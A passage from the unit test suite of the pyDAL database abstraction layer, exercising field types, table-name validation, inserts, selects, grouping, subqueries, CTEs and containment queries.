isinstance(f.formatter("test"), str)
else:
isinstance(f.formatter(datetime.datetime.now()), str)
def testUploadField(self):
import tempfile
stream = tempfile.NamedTemporaryFile()
content = b"this is the stream content"
stream.write(content)
# rewind before inserting
stream.seek(0)
db = self.connect()
db.define_table(
"tt",
Field(
"fileobj", "upload", uploadfolder=tempfile.gettempdir(), autodelete=True
),
)
f_id = db.tt.insert(fileobj=stream)
row = db.tt[f_id]
(retr_name, retr_stream) = db.tt.fileobj.retrieve(row.fileobj)
# name should be the same
self.assertEqual(retr_name, os.path.basename(stream.name))
# content should be the same
retr_content = retr_stream.read()
self.assertEqual(retr_content, content)
# close streams!
retr_stream.close()
# delete
row.delete_record()
# drop
db.tt.drop()
# this part is triggered only if fs (AKA pyfilesystem) module is installed
try:
from fs.memoryfs import MemoryFS
# rewind before inserting
stream.seek(0)
db.define_table(
"tt", Field("fileobj", "upload", uploadfs=MemoryFS(), autodelete=True)
)
f_id = db.tt.insert(fileobj=stream)
row = db.tt[f_id]
(retr_name, retr_stream) = db.tt.fileobj.retrieve(row.fileobj)
# name should be the same
self.assertEqual(retr_name, os.path.basename(stream.name))
# content should be the same
retr_content = retr_stream.read()
self.assertEqual(retr_content, content)
# close streams
retr_stream.close()
stream.close()
# delete
row.delete_record()
# drop
db.tt.drop()
except ImportError:
pass
def testBlobBytes(self):
# Test blob with latin1 encoded bytes
db = self.connect()
obj = pickle.dumps("0")
db.define_table("tt", Field("aa", "blob"))
self.assertEqual(db.tt.insert(aa=obj), 1)
self.assertEqual(to_bytes(db().select(db.tt.aa)[0].aa), obj)
self.assertEqual(db.tt[1].aa, obj)
self.assertEqual(BytesIO(to_bytes(db.tt[1].aa)).read(), obj)
db.tt.drop()
def testRun(self):
# Test all field types and their return values
db = self.connect()
for ft in ["string", "text", "password", "upload", "blob"]:
db.define_table("tt", Field("aa", ft, default=""))
self.assertEqual(db.tt.insert(aa="ö"), 1)
if not (IS_ORACLE and (ft == "text" or ft == "blob")):
# only verify insert for LOB types in oracle;
# select may create seg fault in test env
self.assertEqual(db().select(db.tt.aa)[0].aa, "ö")
db.tt.drop()
db.define_table("tt", Field("aa", "integer", default=1))
self.assertEqual(db.tt.insert(aa=3), 1)
self.assertEqual(db().select(db.tt.aa)[0].aa, 3)
db.tt.drop()
db.define_table("tt", Field("aa", "string"))
ucs = "A\xc3\xa9 A"
self.assertEqual(db.tt.insert(aa=ucs), 1)
self.assertEqual(db().select(db.tt.aa)[0].aa, ucs)
self.assertEqual(db().select(db.tt.aa.with_alias("zz"))[0].zz, ucs)
db.tt.drop()
db.define_table("tt", Field("aa", "double", default=1))
self.assertEqual(db.tt.insert(aa=3.1), 1)
self.assertEqual(db().select(db.tt.aa)[0].aa, 3.1)
db.tt.drop()
db.define_table("tt", Field("aa", "boolean", default=True))
self.assertEqual(db.tt.insert(aa=True), 1)
self.assertEqual(db().select(db.tt.aa)[0].aa, True)
db.tt.drop()
db.define_table("tt", Field("aa", "json", default={}))
# test different python objects for correct serialization in json
objs = [
{"a": 1, "b": 2},
[1, 2, 3],
"abc",
True,
False,
None,
11,
14.3,
long(11),
]
for obj in objs:
rtn_id = db.tt.insert(aa=obj)
rtn = db(db.tt.id == rtn_id).select().first().aa
self.assertEqual(obj, rtn)
db.tt.drop()
db.define_table("tt", Field("aa", "date", default=datetime.date.today()))
t0 = datetime.date.today()
self.assertEqual(db.tt.insert(aa=t0), 1)
self.assertEqual(db().select(db.tt.aa)[0].aa, t0)
db.tt.drop()
db.define_table(
"tt", Field("aa", "datetime", default=datetime.datetime.today())
)
t0 = datetime.datetime(
1971,
12,
21,
10,
30,
55,
0,
)
self.assertEqual(db.tt.insert(aa=t0), 1)
self.assertEqual(db().select(db.tt.aa)[0].aa, t0)
## Row APIs
row = db().select(db.tt.aa)[0]
self.assertEqual(db.tt[1].aa, t0)
self.assertEqual(db.tt["aa"], db.tt.aa)
self.assertEqual(db.tt(1).aa, t0)
self.assertTrue(db.tt(1, aa=None) == None)
self.assertFalse(db.tt(1, aa=t0) == None)
self.assertEqual(row.aa, t0)
self.assertEqual(row["aa"], t0)
self.assertEqual(row["tt.aa"], t0)
self.assertEqual(row("tt.aa"), t0)
## Lazy and Virtual fields
db.tt.b = Field.Virtual(lambda row: row.tt.aa)
# test for FieldVirtual.bind
self.assertEqual(db.tt.b.tablename, "tt")
self.assertEqual(db.tt.b.name, "b")
db.tt.c = Field.Lazy(lambda row: row.tt.aa)
# test for FieldMethod.bind
self.assertEqual(db.tt.c.name, "c")
rows = db().select(db.tt.aa)
row = rows[0]
self.assertEqual(row.b, t0)
self.assertEqual(row.c(), t0)
# test for BasicRows.colnames_fields
rows.colnames.insert(0, "tt.b")
rows.colnames.insert(1, "tt.c")
colnames_fields = rows.colnames_fields
self.assertIs(colnames_fields[0], db.tt.b)
self.assertIs(colnames_fields[1], db.tt.c)
db.tt.drop()
if not IS_ORACLE:
db.define_table("tt", Field("aa", "time", default="11:30"))
t0 = datetime.time(10, 30, 55)
self.assertEqual(db.tt.insert(aa=t0), 1)
self.assertEqual(db().select(db.tt.aa)[0].aa, t0)
db.tt.drop()
# aggregation type detection
db.define_table(
"tt", Field("aa", "datetime", default=datetime.datetime.today())
)
t0 = datetime.datetime(1971, 12, 21, 10, 30, 55, 0)
self.assertEqual(db.tt.insert(aa=t0), 1)
self.assertEqual(db().select(db.tt.aa.min())[0][db.tt.aa.min()], t0)
db.tt.drop()
class TestTables(unittest.TestCase):
def testTableNames(self):
"""
- a "str" something
- not a method or property of DAL
- "dotted-notation" friendly:
- a valid python identifier
- not a python keyword
- not starting with underscore or an integer
- not containing dots
Basically, anything alphanumeric, no symbols, only underscore as
punctuation
"""
# Check that Tables cannot start with underscores
self.assertRaises(SyntaxError, Table, None, "_abc")
# Check that Tables cannot contain punctuation other than underscores
self.assertRaises(SyntaxError, Table, None, "a.bc")
# Check that Tables cannot be a name of a method or property of DAL
for x in ["define_table", "tables", "as_dict"]:
self.assertRaises(SyntaxError, Table, None, x)
# Check that Table allows underscores in the body of a field name.
self.assertTrue(
Table(None, "a_bc"),
"Table isn't allowing underscores in tablename. It should.",
)
# Check that Table names don't allow a python keyword
self.assertRaises(SyntaxError, Table, None, "True")
self.assertRaises(SyntaxError, Table, None, "elif")
self.assertRaises(SyntaxError, Table, None, "while")
# Check that Table names don't allow a non-valid python identifier
non_valid_examples = ["1x", "xx$%@%", "xx yy", "yy\na", "yy\n"]
for a in non_valid_examples:
self.assertRaises(SyntaxError, Table, None, a)
# Check that Table names don't allow a unicode string
non_valid_examples = [
"ℙƴ☂ℌøἤ",
u"ℙƴ☂ℌøἤ",
u"àè",
u"ṧøмℯ",
u"тεṧт",
u"♥αłüℯṧ",
u"ℊεᾔ℮яαт℮∂",
u"♭ƴ",
u"ᾔ☤ρℌℓ☺ḓ",
]
for a in non_valid_examples:
self.assertRaises(SyntaxError, Table, None, a)
class TestAll(unittest.TestCase):
def setUp(self):
self.pt = Table(None, "PseudoTable", Field("name"), Field("birthdate"))
def testSQLALL(self):
ans = "PseudoTable.id, PseudoTable.name, PseudoTable.birthdate"
self.assertEqual(str(SQLALL(self.pt)), ans)
class TestTable(DALtest):
def testTableCreation(self):
# Check for error when not passing type other than Field or Table
self.assertRaises(SyntaxError, Table, None, "test", None)
persons = Table(
None, "persons", Field("firstname", "string"), Field("lastname", "string")
)
# Does it have the correct fields?
self.assertTrue(set(persons.fields).issuperset(set(["firstname", "lastname"])))
# ALL is set correctly
self.assertTrue("persons.firstname, persons.lastname" in str(persons.ALL))
def testTableAlias(self):
db = self.connect()
persons = Table(
db, "persons", Field("firstname", "string"), Field("lastname", "string")
)
aliens = persons.with_alias("aliens")
# Are the different table instances with the same fields
self.assertTrue(persons is not aliens)
self.assertTrue(set(persons.fields) == set(aliens.fields))
def testTableInheritance(self):
persons = Table(
None, "persons", Field("firstname", "string"), Field("lastname", "string")
)
customers = Table(
None, "customers", Field("items_purchased", "integer"), persons
)
self.assertTrue(
set(customers.fields).issuperset(
set(["items_purchased", "firstname", "lastname"])
)
)
class TestInsert(DALtest):
def testRun(self):
db = self.connect()
db.define_table("tt", Field("aa"))
self.assertEqual(db.tt.insert(aa="1"), 1)
if not IS_TERADATA:
self.assertEqual(db.tt.insert(aa="1"), 2)
self.assertEqual(db.tt.insert(aa="1"), 3)
else:
self.assertEqual(db.tt.insert(aa="1"), 1)
self.assertEqual(db.tt.insert(aa="1"), 1)
self.assertEqual(db(db.tt.aa == "1").count(), 3)
self.assertEqual(db(db.tt.aa == "2").isempty(), True)
self.assertEqual(db(db.tt.aa == "1").update(aa="2"), 3)
self.assertEqual(db(db.tt.aa == "2").count(), 3)
self.assertEqual(db(db.tt.aa == "2").isempty(), False)
self.assertEqual(db(db.tt.aa == "2").delete(), 3)
self.assertEqual(db(db.tt.aa == "2").isempty(), True)
class TestSelect(DALtest):
def testRun(self):
db = self.connect()
db.define_table("tt", Field("aa"))
self.assertEqual(db.tt.insert(aa="1"), 1)
if not IS_TERADATA:
self.assertEqual(db.tt.insert(aa="2"), 2)
self.assertEqual(db.tt.insert(aa="3"), 3)
else:
self.assertEqual(db.tt.insert(aa="2"), 1)
self.assertEqual(db.tt.insert(aa="3"), 1)
self.assertEqual(db(db.tt.id > 0).count(), 3)
self.assertEqual(
db(db.tt.id > 0).select(orderby=~db.tt.aa | db.tt.id)[0].aa, "3"
)
self.assertEqual(len(db(db.tt.id > 0).select(limitby=(1, 2))), 1)
self.assertEqual(db(db.tt.id > 0).select(limitby=(1, 2))[0].aa, "2")
self.assertEqual(len(db().select(db.tt.ALL)), 3)
self.assertEqual(db(db.tt.aa == None).count(), 0)
self.assertEqual(db(db.tt.aa != None).count(), 3)
self.assertEqual(db(db.tt.aa > "1").count(), 2)
self.assertEqual(db(db.tt.aa >= "1").count(), 3)
self.assertEqual(db(db.tt.aa == "1").count(), 1)
self.assertEqual(db(db.tt.aa != "1").count(), 2)
self.assertEqual(db(db.tt.aa < "3").count(), 2)
self.assertEqual(db(db.tt.aa <= "3").count(), 3)
self.assertEqual(db(db.tt.aa > "1")(db.tt.aa < "3").count(), 1)
self.assertEqual(db((db.tt.aa > "1") & (db.tt.aa < "3")).count(), 1)
self.assertEqual(db((db.tt.aa > "1") | (db.tt.aa < "3")).count(), 3)
self.assertEqual(db((db.tt.aa > "1") & ~(db.tt.aa > "2")).count(), 1)
self.assertEqual(db(~(db.tt.aa > "1") & (db.tt.aa > "2")).count(), 0)
# Test for REGEX_TABLE_DOT_FIELD
self.assertEqual(db(db.tt).select("tt.aa").first()[db.tt.aa], "1")
def testTestQuery(self):
db = self.connect()
db._adapter.test_connection()
def testListInteger(self):
db = self.connect()
db.define_table("tt", Field("aa", "list:integer"))
l = [1, 2, 3, 4, 5]
db.tt.insert(aa=l)
self.assertEqual(db(db.tt).select("tt.aa").first()[db.tt.aa], l)
def testListString(self):
db = self.connect()
db.define_table("tt", Field("aa", "list:string"))
l = ["a", "b", "c"]
db.tt.insert(aa=l)
self.assertEqual(db(db.tt).select("tt.aa").first()[db.tt.aa], l)
def testListReference(self):
db = self.connect()
db.define_table("t0", Field("aa", "string"))
db.define_table("tt", Field("t0_id", "list:reference t0"))
id_a1 = db.t0.insert(aa="test1")
id_a2 = db.t0.insert(aa="test2")
ref1 = [id_a1]
ref2 = [id_a2]
ref3 = [id_a1, id_a2]
db.tt.insert(t0_id=ref1)
self.assertEqual(db(db.tt).select(db.tt.t0_id).last()[db.tt.t0_id], ref1)
db.tt.insert(t0_id=ref2)
self.assertEqual(db(db.tt).select(db.tt.t0_id).last()[db.tt.t0_id], ref2)
db.tt.insert(t0_id=ref3)
self.assertEqual(db(db.tt).select(db.tt.t0_id).last()[db.tt.t0_id], ref3)
self.assertEqual(db(db.tt.t0_id == ref3).count(), 1)
def testGroupByAndDistinct(self):
db = self.connect()
db.define_table(
"tt", Field("aa"), Field("bb", "integer"), Field("cc", "integer")
)
db.tt.insert(aa="4", bb=1, cc=1)
db.tt.insert(aa="3", bb=2, cc=1)
db.tt.insert(aa="3", bb=1, cc=1)
db.tt.insert(aa="1", bb=1, cc=1)
db.tt.insert(aa="1", bb=2, cc=1)
db.tt.insert(aa="1", bb=3, cc=1)
db.tt.insert(aa="1", bb=4, cc=1)
db.tt.insert(aa="2", bb=1, cc=1)
db.tt.insert(aa="2", bb=2, cc=1)
db.tt.insert(aa="2", bb=3, cc=1)
self.assertEqual(db(db.tt).count(), 10)
# test groupby
result = db().select(db.tt.aa, db.tt.bb.sum(), groupby=db.tt.aa)
self.assertEqual(len(result), 4)
result = db().select(
db.tt.aa, db.tt.bb.sum(), groupby=db.tt.aa, orderby=db.tt.aa
)
self.assertEqual(tuple(result.response[2]), ("3", 3))
result = db().select(
db.tt.aa, db.tt.bb.sum(), groupby=db.tt.aa, orderby=~db.tt.aa
)
self.assertEqual(tuple(result.response[1]), ("3", 3))
result = db().select(
db.tt.aa,
db.tt.bb,
db.tt.cc.sum(),
groupby=db.tt.aa | db.tt.bb,
orderby=(db.tt.aa | ~db.tt.bb),
)
self.assertEqual(tuple(result.response[4]), ("2", 3, 1))
result = db().select(
db.tt.aa,
db.tt.bb.sum(),
groupby=db.tt.aa,
orderby=~db.tt.aa,
limitby=(1, 2),
)
self.assertEqual(len(result), 1)
self.assertEqual(tuple(result.response[0]), ("3", 3))
result = db().select(
db.tt.aa, db.tt.bb.sum(), groupby=db.tt.aa, orderby=db.tt.aa, limitby=(0, 3)
)
self.assertEqual(len(result), 3)
self.assertEqual(tuple(result.response[2]), ("3", 3))
# test having
self.assertEqual(
len(
db().select(
db.tt.aa,
db.tt.bb.sum(),
groupby=db.tt.aa,
having=db.tt.bb.sum() > 2,
)
),
3,
)
# test distinct
result = db().select(db.tt.aa, db.tt.cc, distinct=True)
self.assertEqual(len(result), 4)
result = db().select(db.tt.cc, distinct=True, groupby=db.tt.cc)
self.assertEqual(len(result), 1)
self.assertEqual(result[0].cc, 1)
result = db().select(db.tt.aa, distinct=True, orderby=~db.tt.aa)
self.assertEqual(result[2].aa, "2")
self.assertEqual(result[1].aa, "3")
result = db().select(
db.tt.aa, db.tt.bb, distinct=True, orderby=(db.tt.aa | ~db.tt.bb)
)
self.assertEqual(tuple(result.response[4]), ("2", 3))
result = db().select(db.tt.aa, distinct=True, orderby=~db.tt.aa, limitby=(1, 2))
self.assertEqual(len(result), 1)
self.assertEqual(result[0].aa, "3")
# test count distinct
db.tt.insert(aa="2", bb=3, cc=1)
self.assertEqual(db(db.tt).count(distinct=db.tt.aa), 4)
self.assertEqual(db(db.tt.aa).count(db.tt.aa), 4)
self.assertEqual(db(db.tt.aa).count(), 11)
count = db.tt.aa.count()
self.assertEqual(db(db.tt).select(count).first()[count], 11)
count = db.tt.aa.count(distinct=True)
sum = db.tt.bb.sum()
result = db(db.tt).select(count, sum)
self.assertEqual(tuple(result.response[0]), (4, 23))
def testCoalesce(self):
db = self.connect()
db.define_table("tt", Field("aa"), Field("bb"), Field("cc"), Field("dd"))
db.tt.insert(aa="xx")
db.tt.insert(aa="xx", bb="yy")
db.tt.insert(aa="xx", bb="yy", cc="zz")
if not IS_ORACLE:
# empty string is treated as null
db.tt.insert(aa="xx", bb="yy", cc="zz", dd="")
result = db(db.tt).select(db.tt.dd.coalesce(db.tt.cc, db.tt.bb, db.tt.aa))
self.assertEqual(result.response[0][0], "xx")
self.assertEqual(result.response[1][0], "yy")
self.assertEqual(result.response[2][0], "zz")
if not IS_ORACLE:
self.assertEqual(result.response[3][0], "")
db.tt.drop()
db.define_table("tt", Field("aa", "integer"), Field("bb"))
db.tt.insert(bb="")
db.tt.insert(aa=1)
result = db(db.tt).select(db.tt.aa.coalesce_zero())
self.assertEqual(result.response[0][0], 0)
self.assertEqual(result.response[1][0], 1)
def testTableAliasCollisions(self):
db = self.connect()
db.define_table("t1", Field("aa"))
db.define_table("t2", Field("bb"))
t1, t2 = db.t1, db.t2
t1.with_alias("t2")
t2.with_alias("t1")
# Passing tables by name will result in exception
t1.insert(aa="test")
t2.insert(bb="foo")
db(t1.id > 0).update(aa="bar")
having = t1.aa != None
join = [t2.on(t1.aa == t2.bb)]
db(t1.aa == t2.bb).select(t1.aa, groupby=t1.aa, having=having, orderby=t1.aa)
db(t1.aa).select(t1.aa, join=join, groupby=t1.aa, having=having, orderby=t1.aa)
db(t1.aa).select(t1.aa, left=join, groupby=t1.aa, having=having, orderby=t1.aa)
db(t1.id > 0).delete()
class TestSubselect(DALtest):
def testMethods(self):
db = self.connect()
db.define_table("tt", Field("aa", "integer"), Field("bb"))
data = [dict(aa=1, bb="foo"), dict(aa=1, bb="bar"), dict(aa=2, bb="foo")]
for item in data:
db.tt.insert(**item)
fields = [db.tt.aa, db.tt.bb, db.tt.aa + 2, (db.tt.aa + 1).with_alias("exp")]
sub = db(db.tt).nested_select(*fields, orderby=db.tt.id)
# Check the fields provided by the object
self.assertEqual(sorted(["aa", "bb", "exp"]), sorted(list(sub.fields)))
for name in sub.fields:
self.assertIsInstance(sub[name], Field)
for item in sub:
self.assertIsInstance(item, Field)
self.assertEqual(len(list(sub)), len(sub.fields))
for key, val in zip(sub.fields, sub):
self.assertIs(sub[key], val)
self.assertIs(getattr(sub, key), val)
tmp = sub._filter_fields(dict(aa=1, exp=2, foo=3))
self.assertEqual(tmp, dict(aa=1, exp=2))
# Check result from executing the query
result = sub()
self.assertEqual(len(result), len(data))
for idx, row in enumerate(data):
self.assertEqual(result[idx]["tt"].as_dict(), row)
self.assertEqual(result[idx]["exp"], row["aa"] + 1)
result = db.executesql(str(sub))
for idx, row in enumerate(data):
tmp = [row["aa"], row["bb"], row["aa"] + 2, row["aa"] + 1]
self.assertEqual(list(result[idx]), tmp)
# Check that query expansion methods don't work without alias
self.assertEqual(sub._rname, None)
self.assertEqual(sub._raw_rname, None)
self.assertEqual(sub._dalname, None)
with self.assertRaises(SyntaxError):
sub.query_name()
with self.assertRaises(SyntaxError):
sub.sql_shortref
with self.assertRaises(SyntaxError):
sub.on(sub.aa != None)
# Alias checks
sub = sub.with_alias("foo")
result = sub()
for idx, row in enumerate(data):
self.assertEqual(result[idx]["tt"].as_dict(), row)
self.assertEqual(result[idx]["exp"], row["aa"] + 1)
# Check query expansion methods again
self.assertEqual(sub._rname, None)
self.assertEqual(sub._raw_rname, None)
self.assertEqual(sub._dalname, None)
self.assertEqual(sub.query_name()[0], str(sub))
self.assertEqual(sub.sql_shortref, db._adapter.dialect.quote("foo"))
self.assertIsInstance(sub.on(sub.aa != None), Expression)
def testCTE(self):
db = self.connect()
db.define_table('org', Field('name'), Field('boss', 'reference org'))
org = db.org
def insert_workers(boss, *names):
return [org.insert(name = name, boss = boss) for name in names]
alice = org.insert(name = 'Alice')
jim, tim = insert_workers(alice, 'Jim', 'Tim')
jessy, jenny = insert_workers(jim, 'Jessy', 'Jenny')
insert_workers(tim, 'Tom')
insert_workers(jessy, 'John', 'Jacob')
works_for = db(org.name == 'Alice').cte(
'works_for',
org.id,
org.name.with_alias('top_boss'), # i.e. Alice is top_boss
org.name,
org.boss,
Expression(db, '0', type = 'integer').with_alias('xdepth'),
Expression(db, '" "', type = 'string').with_alias('boss_chain')
).union( lambda works_for: \
db((org.boss == works_for.id) & (org.id != org.boss)).nested_select(
org.id,
works_for.top_boss,
org.name,
org.boss,
(works_for.xdepth + 1).with_alias('xdepth'),
(' ' + works_for.name + works_for.boss_chain).with_alias('boss_chain')
)
)
rows = db().select(works_for.ALL).as_dict()
# reconstruct boss_chain/depth and test them against query result
for row in rows.values():
r = row
boss_chain = []
while True:
r = rows.get(r['boss'])
if not r:
break
boss_chain.append(r['name'])
depth = len(boss_chain)
self.assertEqual(depth, row['xdepth'])
self.assertEqual(' '.join(boss_chain), row['boss_chain'].strip())
def testSelectArguments(self):
db = self.connect()
db.define_table("tt", Field("aa", "integer"), Field("bb"))
data = [
dict(aa=1, bb="foo"),
dict(aa=1, bb="bar"),
dict(aa=2, bb="foo"),
dict(aa=3, bb="foo"),
dict(aa=3, bb="baz"),
]
expected = [(1, None, 0), (2, 2, 2), (2, 2, 2), (3, 4, 3), (3, 8, 6)]
for item in data:
db.tt.insert(**item)
# Check that select clauses work as expected in stand-alone query
t1 = db.tt.with_alias("t1")
t2 = db.tt.with_alias("t2")
fields = [
t1.aa,
t2.aa.sum().with_alias("total"),
t2.aa.count().with_alias("cnt"),
]
join = t1.on(db.tt.bb != t1.bb)
left = t2.on(t1.aa > t2.aa)
group = db.tt.bb | t1.aa
having = db.tt.aa.count() > 1
order = t1.aa | t2.aa.count()
limit = (1, 6)
sub = db(db.tt.aa != 2).nested_select(
*fields,
join=join,
left=left,
orderby=order,
groupby=group,
having=having,
limitby=limit
)
result = sub()
self.assertEqual(len(result), len(expected))
for idx, val in enumerate(expected):
self.assertEqual(result[idx]["t1"]["aa"], val[0])
self.assertEqual(result[idx]["total"], val[1])
self.assertEqual(result[idx]["cnt"], val[2])
# Check again when nested inside another query
# Also check that the alias will not conflict with existing table
t3 = db.tt.with_alias("t3")
sub = sub.with_alias("tt")
query = (t3.bb == "foo") & (t3.aa == sub.aa)
order = t3.aa | sub.cnt
result = db(query).select(t3.aa, sub.total, sub.cnt, orderby=order)
for idx, val in enumerate(expected):
self.assertEqual(result[idx]["t3"]["aa"], val[0])
self.assertEqual(result[idx]["tt"]["total"], val[1])
self.assertEqual(result[idx]["tt"]["cnt"], val[2])
# Check "distinct" modifier separately
sub = db(db.tt.aa != 2).nested_select(db.tt.aa, orderby=db.tt.aa, distinct=True)
result = sub().as_list()
self.assertEqual(result, [dict(aa=1), dict(aa=3)])
def testCorrelated(self):
db = self.connect()
db.define_table(
"t1", Field("aa", "integer"), Field("bb"), Field("mark", "integer")
)
db.define_table("t2", Field("aa", "integer"), Field("cc"))
db.define_table("t3", Field("aa", "integer"))
data_t1 = [
dict(aa=1, bb="bar"),
dict(aa=1, bb="foo"),
dict(aa=2, bb="foo"),
dict(aa=2, bb="test"),
dict(aa=3, bb="baz"),
dict(aa=3, bb="foo"),
]
data_t2 = [dict(aa=1, cc="foo"), dict(aa=2, cc="bar"), dict(aa=3, cc="baz")]
expected_cor = [(1, "foo"), (3, "baz")]
expected_leftcor = [(1, "foo"), (2, None), (3, "baz")]
expected_uncor = [(1, "bar"), (1, "foo"), (2, "foo"), (3, "baz"), (3, "foo")]
for item in data_t1:
db.t1.insert(**item)
for item in data_t2:
db.t2.insert(**item)
db.t3.insert(aa=item["aa"])
# Correlated subqueries
subquery = db.t1.aa == db.t2.aa
subfields = [db.t2.cc]
sub = db(subquery).nested_select(*subfields).with_alias("sub")
query = db.t1.bb.belongs(sub)
order = db.t1.aa | db.t1.bb
result = db(query).select(db.t1.aa, db.t1.bb, orderby=order)
self.assertEqual(len(result), len(expected_cor))
for idx, val in enumerate(expected_cor):
self.assertEqual(result[idx]["aa"], val[0])
self.assertEqual(result[idx]["bb"], val[1])
join = [db.t1.on((db.t3.aa == db.t1.aa) & db.t1.bb.belongs(sub))]
order = db.t3.aa | db.t1.bb
result = db(db.t3).select(db.t3.aa, db.t1.bb, join=join, orderby=order)
self.assertEqual(len(result), len(expected_cor))
for idx, val in enumerate(expected_cor):
self.assertEqual(result[idx]["t3"]["aa"], val[0])
self.assertEqual(result[idx]["t1"]["bb"], val[1])
left = [db.t1.on((db.t3.aa == db.t1.aa) & db.t1.bb.belongs(sub))]
result = db(db.t3).select(db.t3.aa, db.t1.bb, left=left, orderby=order)
self.assertEqual(len(result), len(expected_leftcor))
for idx, val in enumerate(expected_leftcor):
self.assertEqual(result[idx]["t3"]["aa"], val[0])
self.assertEqual(result[idx]["t1"]["bb"], val[1])
order = db.t1.aa | db.t1.bb
db(db.t1.bb.belongs(sub)).update(mark=1)
result = db(db.t1.mark == 1).select(db.t1.aa, db.t1.bb, orderby=order)
self.assertEqual(len(result), len(expected_cor))
for idx, val in enumerate(expected_cor):
self.assertEqual(result[idx]["aa"], val[0])
self.assertEqual(result[idx]["bb"], val[1])
db(~db.t1.bb.belongs(sub)).delete()
result = db(db.t1.id > 0).select(db.t1.aa, db.t1.bb, orderby=order)
self.assertEqual(len(result), len(expected_cor))
for idx, val in enumerate(expected_cor):
self.assertEqual(result[idx]["aa"], val[0])
self.assertEqual(result[idx]["bb"], val[1])
db(db.t1.id > 0).delete()
for item in data_t1:
db.t1.insert(**item)
# Uncorrelated subqueries
kwargs = dict(correlated=False)
sub = db(subquery).nested_select(*subfields, **kwargs)
query = db.t1.bb.belongs(sub)
order = db.t1.aa | db.t1.bb
result = db(query).select(db.t1.aa, db.t1.bb, orderby=order)
self.assertEqual(len(result), len(expected_uncor))
for idx, val in enumerate(expected_uncor):
self.assertEqual(result[idx]["aa"], val[0])
self.assertEqual(result[idx]["bb"], val[1])
join = [db.t1.on((db.t3.aa == db.t1.aa) & db.t1.bb.belongs(sub))]
order = db.t3.aa | db.t1.bb
result = db(db.t3).select(db.t3.aa, db.t1.bb, join=join, orderby=order)
self.assertEqual(len(result), len(expected_uncor))
for idx, val in enumerate(expected_uncor):
self.assertEqual(result[idx]["t3"]["aa"], val[0])
self.assertEqual(result[idx]["t1"]["bb"], val[1])
left = [db.t1.on((db.t3.aa == db.t1.aa) & db.t1.bb.belongs(sub))]
result = db(db.t3).select(db.t3.aa, db.t1.bb, left=left, orderby=order)
self.assertEqual(len(result), len(expected_uncor))
for idx, val in enumerate(expected_uncor):
self.assertEqual(result[idx]["t3"]["aa"], val[0])
self.assertEqual(result[idx]["t1"]["bb"], val[1])
# MySQL does not support subqueries with uncorrelated references
# to target table
# Correlation prevented by alias in parent select
tmp = db.t1.with_alias("tmp")
sub = db(subquery).nested_select(*subfields)
query = tmp.bb.belongs(sub)
order = tmp.aa | tmp.bb
result = db(query).select(tmp.aa, tmp.bb, orderby=order)
self.assertEqual(len(result), len(expected_uncor))
for idx, val in enumerate(expected_uncor):
self.assertEqual(result[idx]["aa"], val[0])
self.assertEqual(result[idx]["bb"], val[1])
join = [tmp.on((db.t3.aa == tmp.aa) & tmp.bb.belongs(sub))]
order = db.t3.aa | tmp.bb
result = db(db.t3).select(db.t3.aa, tmp.bb, join=join, orderby=order)
self.assertEqual(len(result), len(expected_uncor))
for idx, val in enumerate(expected_uncor):
self.assertEqual(result[idx]["t3"]["aa"], val[0])
self.assertEqual(result[idx]["tmp"]["bb"], val[1])
left = [tmp.on((db.t3.aa == tmp.aa) & tmp.bb.belongs(sub))]
result = db(db.t3).select(db.t3.aa, tmp.bb, left=left, orderby=order)
self.assertEqual(len(result), len(expected_uncor))
for idx, val in enumerate(expected_uncor):
self.assertEqual(result[idx]["t3"]["aa"], val[0])
self.assertEqual(result[idx]["tmp"]["bb"], val[1])
# SQLite does not support aliasing target table in UPDATE/DELETE
# MySQL does not support subqueries with uncorrelated references
# to target table
class TestAddMethod(DALtest):
def testRun(self):
db = self.connect()
db.define_table("tt", Field("aa"))
@db.tt.add_method.all
def select_all(table, orderby=None):
return table._db(table).select(orderby=orderby)
self.assertEqual(db.tt.insert(aa="1"), 1)
if not IS_TERADATA:
self.assertEqual(db.tt.insert(aa="1"), 2)
self.assertEqual(db.tt.insert(aa="1"), 3)
else:
self.assertEqual(db.tt.insert(aa="1"), 1)
self.assertEqual(db.tt.insert(aa="1"), 1)
self.assertEqual(len(db.tt.all()), 3)
class TestBelongs(DALtest):
def testRun(self):
db = self.connect()
db.define_table("tt", Field("aa"))
self.assertEqual(db.tt.insert(aa="1"), 1)
if not IS_TERADATA:
self.assertEqual(db.tt.insert(aa="2"), 2)
self.assertEqual(db.tt.insert(aa="3"), 3)
else:
self.assertEqual(db.tt.insert(aa="2"), 1)
self.assertEqual(db.tt.insert(aa="3"), 1)
self.assertEqual(db(db.tt.aa.belongs(("1", "3"))).count(), 2)
self.assertEqual(
db(db.tt.aa.belongs(db(db.tt.id > 2)._select(db.tt.aa))).count(), 1
)
self.assertEqual(
db(
db.tt.aa.belongs(db(db.tt.aa.belongs(("1", "3")))._select(db.tt.aa))
).count(),
2,
)
self.assertEqual(
db(
db.tt.aa.belongs(
db(
db.tt.aa.belongs(
db(db.tt.aa.belongs(("1", "3")))._select(db.tt.aa)
)
)._select(db.tt.aa)
)
).count(),
2,
)
class TestContains(DALtest):
def testRun(self):
db = self.connect()
db.define_table("tt", Field("aa", "list:string"), Field("bb", "string"))
self.assertEqual(db.tt.insert(aa=["aaa", "bbb"], bb="aaa"), 1)
if not IS_TERADATA:
self.assertEqual(db.tt.insert(aa=["bbb", "ddd"], bb="abb"), 2)
self.assertEqual(db.tt.insert(aa=["eee", "aaa"], bb="acc"), 3)
else:
self.assertEqual(db.tt.insert(aa=["bbb", "ddd"], bb="abb"), 1)
self.assertEqual(db.tt.insert(aa=["eee", "aaa"], bb="acc"), 1)
self.assertEqual(db(db.tt.aa.contains("aaa")).count(), 2)
self.assertEqual(db(db.tt.aa.contains("bbb")).count(), 2)
self.assertEqual(db(db.tt.aa.contains("aa")).count(), 0)
self.assertEqual(db(db.tt.bb.contains("a")).count(), 3)
self.assertEqual(db(db.tt.bb.contains("b")).count(), 1)
self.assertEqual(db(db.tt.bb.contains("d")).count(), 0)
self.assertEqual(db(db.tt.aa.contains(db.tt.bb)).count(), 1)
# case-sensitivity tests, if 1 it isn't
is_case_insensitive = db(db.tt.bb.like("%AA%")).count()
if is_case_insensitive:
self.assertEqual(db(db.tt.aa.contains("AAA")).count(), 2)
self.assertEqual(db(db.tt.bb.contains("A")).count(), 3)
else:
self.assertEqual(
db(db.tt.aa.contains("AAA", case_sensitive=True)).count(), 0
)
self.assertEqual(db(db.tt.bb.contains("A", case_sensitive=True)).count(), 0)
self.assertEqual(
db(db.tt.aa.contains("AAA", case_sensitive=False)).count(), 2
)
